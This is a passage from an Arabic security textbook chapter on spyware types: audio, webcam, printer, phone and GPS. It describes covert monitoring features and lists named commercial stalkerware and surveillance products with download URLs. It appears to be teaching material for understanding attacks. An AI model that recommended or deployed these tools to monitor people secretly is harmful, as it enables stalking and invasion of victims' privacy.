‫‪ Sound Snooper‬ھو ﺑرﻧﺎﻣﺞ ﺗﺟﺳس اﻟذي ﯾﺳﻣﺢ ﻟك ﺑﻣراﻗﺑﺔ اﻟﺻوت‪ ،‬وﺗﺳﺟﯾﻼت اﻻﺻوات ﻋﻠﻰ اﻟﻧظﺎم‪ .‬ﯾﺑدأ ﺗﺳﺟﯾل اﻟﺻوت ﺑﺧﻔﺎء‬
‫ﺑﻣﺟرد اﻛﺗﺷﺎف أي ﻣن اﻷﺻوات وﯾﺗوﻗف ﺗﻠﻘﺎﺋﯾﺎ ﻋن اﻟﺗﺳﺟﯾل ﻋﻧدﻣﺎ ﯾﺧﺗﻔﻲ اﻟﺻوت‪ .‬ﯾﻣﻛﻧك اﺳﺗﺧدام ھذه ﻓﻲ ﺗﺳﺟﯾل اﻟﻣﺣﺎدﺛﺎت‪ ،‬رﺻد‬
‫اﻟﻣﻛﺎﻟﻣﺎت اﻟﮭﺎﺗﻔﯾﺔ‪ ،‬ﺳﺟﻼت اﻟﺑث اﻹذاﻋﻲ واﻟﺗﺟﺳس ورﺻد اﻟﻣوظف‪ ،‬وﻣﺎ إﻟﻰ ذﻟك‪ .‬ﯾﺣﺗوي ﻋﻠﻰ أداة ﺗﻧﺷﯾط ﺗﺳﺟﯾل اﻟﺻوت‪ ،‬وﯾدﻋم ﺑطﺎﻗﺎت‬
‫ﺻوت ﻣﺗﻌددة‪ ،‬وﯾﺧزن ﻣﻠﻔﺎت اﻟﺻوت ﻓﻲ أي ﻧوع ﻣن أﻧواع ﻣﻠﻔﺎت اﻟﺻوت‪ ،‬ﯾرﺳل رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻣﻊ ﻣرﻓﻘﺎت ﻋﺑﺎره ﻋن اﻟﻣﻠﻔﺎت‬
‫اﻟﺗﻲ ﺗم ﺗﺳﺟﯾﻠﮭﺎ‪ ،‬وﯾدﻋم وﯾﻧدوز‪.‬‬

‫‪Video Spyware‬‬

‫‪ Video spyware‬ھو ﺑرﻧﺎﻣﺞ ﻟﻠﻣراﻗﺑﺔ اﻟﻔﯾدﯾو‪ .‬ﻣﻊ ھذا اﻟﺑرﻧﺎﻣﺞ‪ ،‬ﯾﻣﻛﻧك ﺗﺳﺟﯾل ﻛل ﻧﺷﺎط ﻓﯾدﯾو ﻣﻊ ﺟدول زﻣﻧﻲ ﻣﺑرﻣﺞ‪ .‬وھذا ﯾﻣﻛن أن ﯾﺗم‬
‫ﺗﺛﺑﯾﺗﮭﺎ ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر اﻟﮭدف دون ﻋﻠم اﻟﻣﺳﺗﺧدم‪ .‬ﺑراﻣﺞ ﺗﺟﺳس اﻟﻔﯾدﯾو ﺗﻌﻣل ﺑﺷﻔﺎﻓﯾﺔ ﻓﻲ اﻟﺧﻠﻔﯾﺔ‪ ،‬ﺗﻘوم ﺑرﺻد وﺗﺳﺟﯾل اﻟﻛﺎﻣﯾرات وﻣﺣﺎدﺛﺎت‬
‫اﻟﻔﯾدﯾو ‪ IM‬ﺳرا‪ .‬ﻣﯾزة اﻟوﺻول ﻋن ﺑﻌد ﻟﺑراﻣﺞ ﺗﺟﺳس اﻟﻔﯾدﯾو ﺗﺳﻣﺢ ﻟﻠﻣﮭﺎﺟﻣﯾن اﻻﺗﺻﺎل ﺑﺎﻟﻧظﺎم اﻟﺑﻌﯾد أو اﻟﮭدف ﻣن أﺟل ﺗﻔﻌﯾل اﻟﺗﻧﺑﯾﮭﺎت‬
‫واﻷﺟﮭزة اﻟﻛﮭرﺑﺎﺋﯾﺔ وﻣﺷﺎھدة اﻟﺻور اﻟﻣﺳﺟﻠﺔ ﻓﻲ أرﺷﯾف اﻟﻔﯾدﯾو أو ﺣﺗﻰ اﻟﺣﺻول ﻋﻠﻰ ﺻور ﺣﯾﺔ ﻣن ﺟﻣﯾﻊ اﻟﻛﺎﻣﯾرات اﻟﻣﺗﺻﻠﺔ ﻟﮭذا اﻟﻧظﺎم‬
‫ﺑﺎﺳﺗﺧدام ﻣﺗﺻﻔﺢ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت ﻣﺛل اﻧﺗرﻧت اﻛﺳﺑﻠورر‪.‬‬

‫‪Video Spyware: Webcam Recorder‬‬


‫اﻟﻣﺻدر‪http://webcamrecorder.com :‬‬
‫‪ Webcam Recorder‬ھو ﺑرﻧﺎﻣﺞ ﻟﻣراﻗﺑﺔ اﻟﻔﯾدﯾو واﻟذى ﯾﺳﻣﺢ ﻟك ﻟﺗﺳﺟﯾل أي ﺷﻲء ﻋﻠﻰ اﻟﺷﺎﺷﺔ ﻣﺛل اﻟﻛﺎﻣﯾرات اﻟﺗﻲ ﺗﻌﻣل ﻋﻠﻰ اﻟﻣﺗﺻﻔﺢ‬
‫اﻟﺧﺎص ﺑك‪ ،‬ﻣﺣﺎدﺛﺎت اﻟدردﺷﺔ ﺑﺎﻟﻔﯾدﯾو‪ ،‬واﻟﻣﺣﺗوى ﻣن ﻣواﻗﻊ اﻟﻔﯾدﯾو ﻣﺛل ﯾوﺗﯾوب‪ ،‬واﻟﻌﺎب اﻟﻔﯾدﯾو ﻋﻠﻰ ﺳطﺢ اﻟﻣﻛﺗب‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪424‬‬

‫‪Video Spyware: other tools‬‬


‫ﯾﺗوﻓر اﻟﻌدﯾد ﻣن ﺑراﻣﺞ ﺗﺟﺳس اﻟﻔﯾدﯾو ﻓﻲ اﻟﺳوق ﻟﻠﻣراﻗﺑﺔ اﻟﻔﯾدﯾو ﺑﺳرﯾﺔ‪ .‬ﺣﯾث ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم اﺳﺗﺧدام ھذا اﻟﺑراﻣﺞ ﻟﻠﻣراﻗﺑﺔ ﺳرا وﺗﺳﺟﯾل‬
‫ﻛﺎﻣﯾرات اﻟوﯾب وﻣﺣﺎدﺛﺎت ‪ IM‬اﻟﻔﯾدﯾو‪ .‬ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟﻣﯾن اﺳﺗﺧدام ﺑراﻣﺞ اﻟﺗﺟﺳس ﻟﻣﺷﺎھدة اﻟﻔﯾدﯾو ﻋن ﺑﻌد ﻛﺎﻣﯾرات اﻟوﯾب ﻣن أﺟل اﻟﺣﺻول‬
‫ﻋﻠﻰ ﻟﻘطﺎت ﺣﯾﺔ ﻣن اﻻﺗﺻﺎﻻت اﻟﺳرﯾﺔ‪ .‬ﻣﻊ ﻣﺳﺎﻋدة ﻣن ھذه اﻟﺑراﻣﺞ‪ ،‬ﯾﻣﻛن اﻟﻣﮭﺎﺟﻣﯾن ﻣن ﺗﺳﺟﯾل وﺗﺷﻐﯾل أي ﺷﻲء ﻋرض ﻋﻠﻰ ﺷﺎﺷﺔ‬
‫اﻟﺿﺣﯾﺔ‪ .‬وﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض ﻣن ﺑراﻣﺞ ﺗﺟﺳس اﻟﻔﯾدﯾو اﻟﻣﺳﺗﺧدﻣﺔ ﻟﮭذه اﻷﻏراض ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬
‫‪WebcamMagic available at http://www.robomagic.com‬‬
‫‪MyWebcam Broadcaster available at http://www.eyespyfx.com‬‬
‫‪Digi-Watcher available at http://www.digi-watcher.com‬‬
‫‪NET Video Spy available at http://www.sarbash.com‬‬
‫‪Eyeline Video Surveillance Software available at http://www.nchsoftware.com‬‬
‫‪Capturix VideoSpy available at http://www.capturix.com‬‬
‫‪WebCam Looker available at http://felenasoft.com‬‬
‫‪SecuritySpy available at http://www.bensoftware.com‬‬
‫‪iSpy available at http://www.ispyconnect.com‬‬
‫‪Print Spyware‬‬

‫ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟﻣﯾن ﻣن ﻣراﻗﺑﺔ اﺳﺗﺧدام اﻟطﺎﺑﻌﺔ ﻟﻠﻣﻧظﻣﺔ اﻟﮭدف ﻋن ﺑﻌد ﺑﺎﺳﺗﺧدام ﺑراﻣﺞ ﺗﺟﺳس اﻟطﺑﺎﻋﺔ‪ .‬ﺑراﻣﺞ ﺗﺟﺳس اﻟطﺑﺎﻋﺔ ھﻲ ﺑرﻣﺟﯾﺎت‬
‫ﻟرﺻد اﺳﺗﺧدام اﻟطﺎﺑﻌﺎت ﻓﻲ اﻟﻣؤﺳﺳﺔ‪ .‬ﯾوﻓر ﺑراﻣﺞ ﺗﺟﺳس اﻟطﺎﺑﻌﺎت ﻣﻌﻠوﻣﺎت دﻗﯾﻘﺔ ﻋن أﻧﺷطﺔ اﻟطﺑﺎﻋﺔ ﻟﻠطﺎﺑﻌﺎت ﻓﻲ اﻟﻣﻛﺗب أو اﻟطﺎﺑﻌﺎت‬
‫اﻟﻣﺣﻠﯾﺔ‪ ،‬ﻣﻣﺎ ﯾﺳﺎﻋد ﻓﻲ ﺗﺣﺳﯾن اﻟطﺑﺎﻋﺔ‪ ،‬وﺗوﻓﯾر اﻟﺗﻛﺎﻟﯾف‪ ،‬اﻟﺦ‪ .‬ﻓﺈﻧﮫ ﯾﺳﺟل ﺟﻣﯾﻊ اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺗﻌﻠﻘﺔ ﺑﺄﻧﺷطﺔ اﻟطﺎﺑﻌﺔ وﺣﻔظ اﻟﻣﻌﻠوﻣﺎت ﻓﻲ‬
‫ﺳﺟﻼت ﻣﺷﻔرة وإرﺳﺎل ﻣﻠف اﻟﺳﺟل ﻟﻌﻧوان اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﻣﺣدد ﻋﺑر اﻹﻧﺗرﻧت‪ .‬وﯾﺗﻛون اﻟﺗﻘرﯾر اﻟﺳﺟل ﺑﺎﻟﺿﺑط ﻣن ﻣﮭﻣﺔ اﻟطﺑﺎﻋﺔ ﻣﺛل‬
‫ﻋدد اﻟﺻﻔﺣﺎت اﻟﻣطﺑوﻋﺔ‪ ،‬ﻋدد اﻟﻧﺳﺦ‪ ،‬واﻟﻣﺣﺗوى اﻟﻣطﺑوع‪ ،‬واﻟﺗﺎرﯾﺦ واﻟوﻗت اﻟذي اﺳﺗﻐرق ﻟﻠﻘﯾﺎم ﺑﺎﻟطﺑﺎﻋﺔ‪.‬‬

‫ﺑراﻣﺞ ﺗﺟﺳس اﻟطﺑﺎﻋﺔ ﺗﻘوم ﺑﺗﺳﺟﯾل ﺗﻘﺎرﯾر ﺳﺟل ﻓﻲ أﺷﻛﺎل ﻣﺧﺗﻠﻔﺔ ﻷﻏراض ﻣﺧﺗﻠﻔﺔ ﻣﺛل ﻋﻠﻰ ﺷﻛل ‪ web format‬ﻹرﺳﺎل اﻟﺗﻘﺎرﯾر إﻟﻰ‬
‫اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻣن ﺧﻼل ﺷﺑﻛﺔ اﻹﻧﺗرﻧت أو اﻹﻧﺗرﻧت او ﻋﻠﻰ ﺷﻛل ﻣﺷﻔرة وﻣﺧﺑﺄة ﻟﻠﺗﺧزﯾن ﻋﻠﻰ اﻟﻘرص اﻟﻣﺣﻠﻲ‪.‬‬

‫ﺗﻘﺎرﯾر اﻟﺳﺟل اﻟﺗﻲ ﺗم إﻧﺷﺎؤھﺎ ﺳوف ﺗﺳﺎﻋد اﻟﻣﮭﺎﺟﻣﯾن ﻓﻲ ﺗﺣﻠﯾل أﻧﺷطﺔ اﻟطﺎﺑﻌﺔ‪ .‬وﯾﺑﯾن اﻟﺗﻘرﯾر ﻛﯾﻔﯾﺔ ﺗﺳﺟﯾل اﻟﻌدﯾد ﻣن اﻟوﺛﺎﺋﻖ وطﺑﺎﻋﺗﮭﺎ ﻣن‬
‫ﻗﺑل ﻛل ﻣوظف أو ﻣﺣطﺔ ﻋﻣل‪ ،‬ﺑﺟﺎﻧب اﻟﻔﺗرة اﻟزﻣﻧﯾﺔ‪ .‬ھذا ﯾﺳﺎﻋد ﻓﻲ رﺻد اﺳﺗﺧدام اﻟطﺎﺑﻌﺔ وﯾﺣدد أي ﻣن اﻟﻣوظﻔﯾن ﯾﺳﺗﺧدﻣوا اﻟطﺎﺑﻌﺔ‪ .‬ھذا‬
‫اﻟﺑرﻧﺎﻣﺞ ﯾﺳﻣﺢ أﯾﺿﺎ ﻓﻲ اﻟﺣد ﻣن اﻟوﺻول إﻟﻰ اﻟطﺎﺑﻌﺔ‪ .‬ﺗﻘﺎرﯾر اﻟﺳﺟل ھذه ﺗﺳﺎﻋد اﻟﻣﮭﺎﺟﻣﯾن ﻣن ﺗﻌﻘب اﻟﻣﻌﻠوﻣﺎت ﺣول اﻟوﺛﺎﺋﻖ ﺣﺳﺎﺳﺔ‬
‫واﻟﺳرﯾﺔ اﻟﺗﻲ ﺗم طﺑﺎﻋﺗﮭﺎ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪425‬‬

‫‪Print Spyware: Printer Activity Monitor‬‬


‫اﻟﻣﺻدر‪http://www.redline-software.com :‬‬
‫‪ Printer Activity Monitor‬ھﻲ واﺣدة ﻣن ﺑراﻣﺞ ﺗﺟﺳس اﻟطﺑﺎﻋﺔ اﻟﺗﻲ ﯾﻣﻛن أن ﯾﺗم اﺳﺗﺧداﻣﮭﺎ ﻣن ﻗﺑل اﻟﻣﮭﺎﺟم ﻟﻣراﻗﺑﺔ اﺳﺗﺧدام‬
‫اﻟطﺎﺑﻌﺔ ﻟﻠﻣﻧظﻣﺔ اﻟﮭدف ﻟﻠﺣﺻول ﻋﻠﻰ ﻣﻌﻠوﻣﺎت ﺣول اﻟﻣﺳﺗﻧدات اﻟﻣطﺑوﻋﺔ‪ .‬ﯾﺳﻣﺢ ھذا اﻟﺗطﺑﯾﻖ ﻟﻠﻣﮭﺎﺟﻣﯾن ﻟرﺻد وﺗدﻗﯾﻖ اﻟطﺎﺑﻌﺎت ﺑﺣﯾث اﻧﮫ‬
‫ﯾﻣﻛن ﻣﻌرﻓﺔ اﻟوﺛﺎﺋﻖ اﻟﺗﻲ ﺗطﺑﻊ ﻋﻠﻰ ﻛل ﻣن اﻟطﺎﺑﻌﺎت اﻟﻣﺧﺗﺎرة‪ ،‬ﻋدد اﻟﺻﻔﺣﺎت اﻟﻣطﺑوﻋﺔ‪ ،‬اﻟﺦ‪.‬‬
‫ﯾﻣﻛن اﻟﻣﮭﺎﺟﻣﯾن ﺗﻔﻌل اﻷﺷﯾﺎء اﻟﺗﺎﻟﯾﺔ ﻣﻊ ﻣﺳﺎﻋدة ﻣن ‪:Printer Activity Monitor‬‬
‫‪ .1‬ﺗﺗﺑﻊ ﺑدﻗﺔ ﻣﮭﺎم اﻟطﺑﺎﻋﺔ‪.‬‬
‫‪ .2‬رﺻد أﻋداد ﻛﺑﯾرة ﻣن اﻟطﺎﺑﻌﺎت ﻓﻲ وﻗت واﺣد‪.‬‬
‫‪ .3‬ﻣراﻗﺑﺔ اﻟطﺎﺑﻌﺎت ﻋن ﺑﻌد‪.‬‬
‫‪ .4‬إﻧﺷﺎء ﺗﻘﺎرﯾر ﺣول اﺳﺗﺧدام اﻟطﺎﺑﻌﺔ‪.‬‬

‫‪Print Spyware: other tools‬‬


‫اﻟﻣﮭﺎﺟﻣﯾن ﯾﻣﻛﻧﮭم أﯾﺿﺎ اﺳﺗﺧدام اﻟﺗطﺑﯾﻘﺎت اﻟﺗﺎﻟﯾﺔ ﻟرﺻد اﻟطﺎﺑﻌﺔ ﻛﺑراﻣﺞ ﺗﺟﺳس اﻟطﺎﺑﻌﺔ ﻟﻠﺣﺻول ﻋﻠﻰ ﻣﻌﻠوﻣﺎت ﺣول اﺳﺗﺧدام اﻟطﺎﺑﻌﺔ‬
‫اﻟﮭدف‪ .‬ھذا اﻟﺗطﺑﯾﻘﺎت ﺗﺳﺎﻋد اﻟﻣﮭﺎﺟﻣﯾن ﻟﺗﺗﺑﻊ اﺳﺗﺧدام اﻟطﺎﺑﻌﺔ ﻣﺛل ﻣﺣﺗوى اﻟوﺛﺎﺋﻖ اﻟﻣطﺑوﻋﺔ‪ ،‬وﻧﺳﺦ اﻟرﻗم اﻟﻣطﺑوع وﺗﺎرﯾﺦ واﻟوﻗت اﻟذي‬
‫اﺳﺗﻐرﻗﺗﮫ اﻟطﺑﺎﻋﺔ‪ ،‬وھﻠم ﺟرا‪ .‬وﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض ﺑراﻣﺞ اﻟﺗﺟﺳس اﻟطﺑﺎﻋﺔ ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬
‫‪Print Monitor Pro available at http://www.spyarsenal.com‬‬
‫‪Accurate Printer Monitor available at http://www.aggsoft.com‬‬
‫‪Print Censor Professional available at http://usefulsoft.com‬‬
‫‪All-Spy Print available at http://www.all-spy.com‬‬
‫‪O&K Print Watch available at http://www.prnwatch.com‬‬
‫‪Print Job Monitor available at http://www.imonitorsoft.com‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪426‬‬

‫‪PrintTrak available at http://www.lygil.com‬‬


‫‪Printer Admin - Copier Tracking System available at http://www.printeradmin.com‬‬
‫‪Print Inspector available at http://www.softperfect.com‬‬
‫‪Print365 available at http://krawasoft.com‬‬
‫‪Telephone/Cell Phone Spyware‬‬

‫ﺑراﻣﺞ اﻟﺗﺟﺳس ﻋﻠﻰ اﻟﮭﺎﺗف‪/‬اﻟﮭﺎﺗف اﻟﺧﻠوي ھو أداة ﺑرﻣﺟﯾﺎت اﻟﺗﻲ ﺗﻣﻧﺣك اﻟوﺻول اﻟﻛﺎﻣل وﻣراﻗﺑﺔ ھﺎﺗف‪/‬اﻟﮭﺎﺗف اﻟﺧﻠوي اﻟﺿﺣﯾﺔ‪ .‬ﺣﯾث اﻧﮫ‬
‫ﯾﻘوم ﺑﺈﺧﻔﺎء ﻧﻔﺳﮫ ﺗﻣﺎﻣﺎ ﻋن ﻣﺳﺗﺧدم اﻟﮭﺎﺗف‪ .‬ﺗﻘوم ھذه اﻟﺗطﺑﯾﻘﺎت ﺑﺗﺳﺟﯾل و‪ log‬ﻛل ﻧﺷﺎط ﻋﻠﻰ اﻟﮭﺎﺗف ﻣﺛل اﺳﺗﺧدام اﻻﻧﺗرﻧت واﻟرﺳﺎﺋل‬
‫اﻟﻧﺻﯾﺔ‪ ،‬واﻟﻣﻛﺎﻟﻣﺎت اﻟﮭﺎﺗﻔﯾﺔ‪ .‬ﺛم ﯾﻣﻛﻧك اﻟوﺻول إﻟﻰ اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺳﺟﻠﺔ ﻋن طرﯾﻖ اﻟﻣوﻗﻊ اﻹﻟﻛﺗروﻧﻲ ﻟﻠﺑرﻧﺎﻣﺞ اﻟرﺋﯾﺳﻲ أو ﯾﻣﻛﻧك أﯾﺿﺎ‬
‫اﻟﺣﺻول ﻋﻠﻰ ھذه اﻟﻣﻌﻠوﻣﺎت ﻣن ﺧﻼل ﺗﺗﺑﻊ اﻟرﺳﺎﺋل اﻟﻘﺻﯾرة أو اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ .‬ﻋﺎدة‪ ،‬ﯾﺗم اﺳﺗﺧدام ھذه اﻟﺗطﺑﯾﻘﺎت ﻟرﺻد وﺗﺗﺑﻊ اﺳﺗﺧدام‬
‫اﻟﮭﺎﺗف ﻣن ﻗﺑل اﻟﻣوظﻔﯾن‪ .‬وﻟﻛن اﻟﻣﮭﺎﺟﻣﯾن ﯾﺳﺗﺧدﻣون ھذا اﻟﺗطﺑﯾﻘﺎت ﻟﺗﻌﻘب اﻟﻣﻌﻠوﻣﺎت اﻟﺧﺎﺻﺔ ﺑﺎﻟﮭﺎﺗف‪/‬اﻟﮭﺎﺗف اﻟﺧﻠوي ﻟﻸﺷﺧﺎص‬
‫اﻟﻣﺳﺗﮭدﻓﯾن أو اﻟﻣﻧظﻣﺎت‪ .‬اﺳﺗﺧدام ھذا اﻟﺗطﺑﯾﻘﺎت ﻻ ﯾﺗطﻠب أي اﻣﺗﯾﺎزات ﻟدﯾﮭﺎ‪.‬‬

‫ﺗﺷﻣل ﺗطﺑﯾﻘﺎت اﻟﺗﺟﺳس ﻋﻠﻰ اﻟﮭﺎﺗف‪/‬اﻟﮭﺎﺗف اﻟﺧﻠوي اﻟﻣﯾزات اﻷﻛﺛر ﺷﯾوﻋﺎ‪:‬‬


‫‪ - Call History‬ﺣﯾث ﯾﻣﻛﻧك أن ﺗرى ﺳﺟل اﻟﮭﺎﺗف )‪ (call history‬ﻛﻠﮫ )ﺳواء اﻟﻣﻛﺎﻟﻣﺎت اﻟﺻﺎدرة واردة(‪.‬‬
‫‪ - View Text Messages‬ﺗﻣﻛﻧك ﻣن ﻣﺷﺎھدة ﺟﻣﯾﻊ اﻟرﺳﺎﺋل اﻟﻧﺻﯾﺔ اﻟواردة واﻟﺻﺎدرة‪ .‬ﯾﻣﻛن اﻻطﻼع ﻋﻠﻰ اﻟرﺳﺎﺋل ﺣﺗﻰ اﻟﺗﻲ ﺣذف‬
‫ﯾﻣﻛن رؤﯾﺗﮭﺎ وﺗﺳﺟﯾﻠﮭﺎ ﻓﻲ ﻣﻠف اﻟﺳﺟل‪.‬‬
‫‪ - Web Site History‬ﺳﺟل ﻛﺎﻣل ﻟﺟﻣﯾﻊ اﻟﻣواﻗﻊ اﻟﺗﻲ ﺗﻣت زﯾﺎرﺗﮭﺎ ﻣن ﺧﻼل اﻟﮭﺎﺗف وﺳوف ﯾﺗم ﺗﺳﺟﯾﻠﮭﺎ إﻟﻰ ﻣﻠف ﺗﻘرﯾر ﺳﺟل‪.‬‬
‫‪ - GPS Tracking‬ﺳوف ﺗظﮭر ﻟك ﺑراﻣﺞ اﻟﺗﺟﺳس ﺣﯾث ﯾﻛون اﻟﮭﺎﺗف ﻓﻲ اﻟوﻗت اﻟﺣﻘﯾﻘﻲ‪ .‬ھﻧﺎك أﯾﺿﺎ ﺳﺟل ﻋن ﻣوﻗﻊ اﻟﮭﺎﺗف اﻟﺧﻠﯾوي‬
‫ﺣﺗﻰ ﺗﺳﺗطﯾﻊ أن ﺗرى اﻟﻣﻛﺎن اﻟذي ﯾوﺟد ﻓﯾﮫ اﻟﮭﺎﺗف‪.‬‬
‫ھذه اﻟﺗطﺑﯾﻘﺎت ﺗﻌﻣل ﻛﻣﺎ ھو ﻣﺑﯾن ﻓﻲ اﻟرﺳم اﻟﺑﯾﺎﻧﻲ اﻟﺗﺎﻟﻲ‪:‬‬

‫‪Cellphone Spyware: Mobile Spy‬‬


‫اﻟﻣﺻدر‪http://www.phonespysoftware.com :‬‬
‫‪ Mobile Spy‬ھﻲ ﺑراﻣﺞ ﻟﻠﺗﺟﺳس ﻋﻠﻰ اﻟﻣﺣﻣول واﻟﺗﻲ ﺗﺳﺎﻋدك ﻋﻠﻰ رﺻد وﺗﺳﺟﯾل أﻧﺷطﺔ اﻟﮭﺎﺗف اﻟﻣﺣﻣول اﻟﻣﺳﺗﮭدف‪ .‬ﺗﺣﺗﺎج إﻟﻰ ﺗﺛﺑﯾت‬
‫ھذا اﻟﺑرﻧﺎﻣﺞ ﻋﻠﻰ اﻟﮭﺎﺗف اﻟﻣﺣﻣول‪ .‬ﻣﻊ ﻣﺳﺎﻋدة ﻣن ھذا اﻟﺑرﻧﺎﻣﺞ‪ ،‬ﯾﻣﻛﻧك ﺗﺳﺟﯾل اﻷﻧﺷطﺔ‪ ،‬وﺳﺟﻼت‪ ،‬وﻣواﻗﻊ ‪ GPS‬ﻣن اﻟﮭدف‪ .‬ﻟﻌرض‬
‫اﻟﻧﺗﺎﺋﺞ‪ ،‬ﺑﻛل ﺑﺑﺳﺎطﺔ ﺳوف ﺗﺣﺗﺎج ﺗﺳﺟﯾل اﻟدﺧول إﻟﻰ ﺣﺳﺎب آﻣن ﺑﺎﺳﺗﺧدام أي ﺟﮭﺎز ﻛﻣﺑﯾوﺗر أو ﻣﺗﺻﻔﺢ وﯾب ﻟﻠﺟوال‪ .‬ﯾﺗم ﻋرض ﺳﺟﻼت‬
‫ﺣﺳب اﻟﻔﺋﺎت وﻓرزھﺎ ﻟﺳﮭوﻟﺔ اﻟﺗﺻﻔﺢ‪.‬‬
‫ﺗﺳﻣﺢ ﻟﻠﻣﮭﺎﺟﻣﯾن ﺑﺗﺳﺟﯾل اﻟرﺳﺎﺋل اﻟﻧﺻﯾﺔ‪ ،‬وﻣراﻗﺑﺔ وﺳﺎﺋل اﻻﻋﻼم اﻻﺟﺗﻣﺎﻋﯾﺔ‪ ،‬ورﺻد اﻟﻣواﻗﻊ‪ ،‬وﺗﺗﺑﻊ ﻧظﺎم ﺗﺣدﯾد اﻟﻣواﻗﻊ وﺗﺳﺟﯾل اﻟﺻور‬
‫واﻟﻔﯾدﯾوھﺎت اﻟﺗﻲ ﺳﺟﻠت‪ ،‬ﻣﺷﺎھدة ﺣﯾﺔ ﻟﻠوﺣﺔ اﻟﺗﺣﻛم وﺗﻔﺎﺻﯾل اﻟﻣﻛﺎﻟﻣﺔ‪ ،‬اﻟﺦ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪427‬‬

‫‪Telephone/Cell Phone Spyware: other tools‬‬


‫ﻣﺛل ‪ ،Mobile Spy‬ﺣﯾث ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم أﯾﺿﺎ اﺳﺗﺧدام اﻟﺑراﻣﺞ اﻟﺗﺎﻟﯾﺔ ﻟﻠﺗﺟﺳس ﻋﻠﻰ اﻟﮭﺎﺗف‪ /‬اﻟﮭﺎﺗف اﻟﺧﻠوي ﻟﺗﺳﺟﯾل ﻛل ﻧﺷﺎط ﻋﻠﻰ اﻟﮭﺎﺗف‬
‫ﻣﺛل اﺳﺗﺧدام اﻹﻧﺗرﻧت واﻟرﺳﺎﺋل اﻟﻧﺻﯾﺔ واﻟﻣﻛﺎﻟﻣﺎت اﻟﮭﺎﺗﻔﯾﺔ‪ ،‬وﻣﺎ إﻟﻰ ذﻟك‪ .‬وﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض ﻣن ﺑراﻣﺞ اﻟﺗﺟﺳس ﻋﻠﻰ اﻟﮭﺎﺗف‪/‬اﻟﮭﺎﺗف اﻟﺧﻠوي‬
‫اﻟﻣﺗوﻓرة‪:‬‬
‫‪VRS Recording System available at http://www.nch.com.au‬‬
‫‪Modern Spy available at http://www.modemspy.com‬‬
‫‪Mobistealth Cell Phone Spy available at http://www.mobistealth.com‬‬
‫‪SPYPhone GOLD available at http://spyera.com‬‬
‫‪SpyPhoneTap available at http://www.spyphonetap.com‬‬
‫‪FlexiSPY OMNI available at http://www.flexispy.com‬‬
‫‪SpyBubble available at http://www.spybubble.com‬‬
‫‪MOBILE SPY available at http://www.mobile-spy.com‬‬
‫‪StealthGenie available at http://www.stealthgenie.com‬‬
‫‪GPS Spyware‬‬
‫‪ GPS spyware‬ھو ﺟﮭﺎز أو ﺗطﺑﯾﻖ ﺑرﻣﺟﯾﺎت واﻟﺗﻲ ﺗﺳﺗﺧدم ﻧظﺎم ﺗﺣدﯾد اﻟﻣواﻗﻊ اﻟﻌﺎﻟﻣﻲ )‪ (GPS‬ﻟﺗﺣدﯾد ﻣوﻗﻊ اﻟﺳﯾﺎرة أو ﺷﺧص أو‬
‫اﻷﺻول اﻷﺧرى اﻟﻣﺗﺻﻠﺔ ﺑﮭﺎ أو اﻟﻣﺛﺑت ﻋﻠﯾﮭﺎ‪ .‬ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟﻣﯾن اﺳﺗﺧدام ھذه اﻟﺑراﻣﺞ ﻟﺗﻌﻘب اﻟﺷﺧص اﻟﮭدف‪ .‬ﺑراﻣﺞ اﻟﺗﺟﺳس ھذه ﺗﺳﻣﺢ ﻟك‬
‫ﺗﺗﺑﻊ ﻧﻘﺎط ﻣﻛﺎن اﻟﮭﺎﺗف وﺣﻔظ أو ﺗﺧزﯾن ھذا ﻓﻲ ﻣﻠف ﺳﺟل وارﺳﺎﻟﮭﺎ إﻟﻰ ﻋﻧوان اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﻣﺣدد‪ .‬ﺛم ﯾﻣﻛﻧك ﻣﺷﺎھدة ﻣوﻗﻊ اﻟﻣﺳﺗﺧدم‬
